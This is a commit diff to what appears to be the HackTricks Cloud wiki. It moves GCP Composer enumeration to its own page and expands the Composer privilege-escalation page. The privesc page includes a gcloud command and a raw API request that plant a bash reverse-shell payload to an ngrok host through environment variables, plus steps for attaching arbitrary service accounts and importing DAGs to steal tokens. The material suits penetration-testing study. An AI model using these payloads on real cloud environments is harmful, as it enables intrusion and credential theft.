GITBOOK-635: No subject

SUMMARY.md

@@ -150,7 +150,8 @@
     * [GCP - Compute Enum](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/README.md)
       * [GCP - Compute Instances](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-compute-instance.md)
       * [GCP - VPC & Networking](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md)
-    * [GCP - Containers, GKE & Composer Enum](pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md)
+    * [GCP - Composer Enum](pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md)
+    * [GCP - Containers & GKE Enum](pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md)
     * [GCP - DNS Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md)
     * [GCP - Filestore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md)
     * [GCP - Firebase Enum](pentesting-cloud/gcp-security/gcp-services/gcp-firebase-enum.md)

pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md

@@ -9,19 +9,93 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>
 
 ## composer
 
+More info in:
+
+{% content-ref url="../gcp-services/gcp-composer-enum.md" %}
+[gcp-composer-enum.md](../gcp-services/gcp-composer-enum.md)
+{% endcontent-ref %}
+
 ### `composer.environments.create`
 
 It's possible to **attach any service account** to the newly create composer environment with that permission. Later you could execute code inside composer to steal the service account token.
 
+```bash
+gcloud composer environments create privesc-test \
+  --project "${PROJECT_ID}" \
+  --location europe-west1 \
+  --service-account="${ATTACK_SA}@${PROJECT_ID}.iam.gserviceaccount.com"
+```
+
 More info about the exploitation [**here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/i-composer.environmets.create.sh).
 
+### `composer.environments.update`
+
+It's possible to update composer environment, for example, modifying env variables:
+
+{% code overflow="wrap" %}
+```bash
+# Even if it says you don't have enough permissions the update happens
+gcloud composer environments update \
+    projects/<project-id>/locations/<location>/environments/<composer-env-name> \
+    --update-env-variables="PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=/bin/bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/19990 0>&1' & #%s" \
+    --location <location> \
+    --project <project-id>
+
+# Call the API endpoint directly
+PATCH /v1/projects/<project-id>/locations/<location>/environments/<composer-env-name>?alt=json&updateMask=config.software_config.env_variables HTTP/2
+Host: composer.googleapis.com
+User-Agent: google-cloud-sdk gcloud/480.0.0 command/gcloud.composer.environments.update invocation-id/826970373cd441a8801d6a977deba693 environment/None environment-version/None client-os/MACOSX client-os-ver/23.4.0 client-pltf-arch/arm interactive/True from-script/False python/3.12.3 term/xterm-256color (Macintosh; Intel Mac OS X 23.4.0)
+Accept-Encoding: gzip, deflate, br
+Accept: application/json
+Content-Length: 178
+Content-Type: application/json
+X-Goog-Api-Client: cred-type/sa
+Authorization: Bearer [token]
+X-Allowed-Locations: 0x0
+
+{"config": {"softwareConfig": {"envVariables": {"BROWSER": "/bin/bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/1890 0>&1' & #%s", "PYTHONWARNINGS": "all:0:antigravity.x:0:0"}}}}
+```
+{% endcode %}
+
+TODO: Get RCE by adding new pypi packages to the environment
+
+### Download Dags
+
+Check the source code of the dags being executed:
+
+{% code overflow="wrap" %}
+```bash
+mkdir /tmp/dags
+gcloud composer environments storage dags export --environment <environment> --location <loc> --destination /tmp/dags
+```
+{% endcode %}
+
+### Import Dags
+
+Import Dags code to compromise the environment and be able to steal the token from the metadata endpoint:
+
+{% code overflow="wrap" %}
+```bash
+# TODO: Create dag to get a rev shell
+gcloud composer environments storage dags import --environment test --location us-central1 --source /tmp/asd
+```
+{% endcode %}
+
+### Import Plugins
+
+TODO: Check what is possible to compromise by uploading plugins
+
+### Import Data
+
+TODO: Check what is possible to compromise by uploading data
+
 <details>
 
 <summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
@@ -31,7 +105,7 @@ Other ways to support HackTricks:
 * If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
 * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
 * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 * **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
 
 </details>

pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md

@@ -0,0 +1,69 @@
+# GCP - Composer Enum
+
+<details>
+
+<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
+
+Other ways to support HackTricks:
+
+* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+
+## Basic Information
+
+**Google Cloud Composer** is a fully managed **workflow orchestration service** built on **Apache Airflow**. It enables you to author, schedule, and monitor pipelines that span across clouds and on-premises data centers. With GCP Composer, you can easily integrate your workflows with other Google Cloud services, facilitating efficient data integration and analysis tasks. This service is designed to simplify the complexity of managing cloud-based data workflows, making it a valuable tool for data engineers and developers handling large-scale data processing tasks.
+
+### Enumeration
+
+{% code overflow="wrap" %}
+```bash
+# Get envs info
+gcloud composer environments list --locations <loc>
+gcloud composer environments describe --location <loc> <environment>
+
+# Get list of dags
+gcloud composer environments storage dags list --environment <environment> --location <loc>
+# Download dags code
+mkdir /tmp/dags
+gcloud composer environments storage dags export --environment <environment> --location <loc> --destination /tmp/dags
+
+# List Data from composer
+gcloud composer environments storage data list --environment <environment> --location <loc>
+# Download data
+mkdir /tmp/data
+gcloud composer environments storage data export --environment <environment> --location <loc> --destination /tmp/data
+
+# List Plugins from composer
+gcloud composer environments storage plugins list --environment <environment> --location <loc>
+# Download plugins
+mkdir /tmp/plugins
+gcloud composer environments storage data export --environment <environment> --location <loc> --destination /tmp/plugins
+```
+{% endcode %}
+
+### Privesc
+
+In the following page you can check how to **abuse composer permissions to escalate privileges**:
+
+{% content-ref url="../gcp-privilege-escalation/gcp-composer-privesc.md" %}
+[gcp-composer-privesc.md](../gcp-privilege-escalation/gcp-composer-privesc.md)
+{% endcontent-ref %}
+
+<details>
+
+<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
+
+Other ways to support HackTricks:
+
+* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
+* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>

pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md

@@ -1,4 +1,4 @@
-# GCP - Containers, GKE & Composer Enum
+# GCP - Containers & GKE Enum
 
 <details>
 
@@ -54,23 +54,6 @@ gcloud container node-pools list --zone <zone> --cluster <cluster>
 gcloud container node-pools describe --cluster <cluster> --zone <zone> <node-pool>
 ```
 
-## Composer
-
-This is the GCP managed version of **Airflow**.
-
-```bash
-gcloud composer environments list --locations <loc>
-gcloud composer environments describe --location <loc> <environment>s
-```
-
-### Privesc
-
-In the following page you can check how to **abuse composer permissions to escalate privileges**:
-
-{% content-ref url="../gcp-privilege-escalation/gcp-composer-privesc.md" %}
-[gcp-composer-privesc.md](../gcp-privilege-escalation/gcp-composer-privesc.md)
-{% endcontent-ref %}
-
 ## Kubernetes
 
 For information about what is Kubernetes check this page: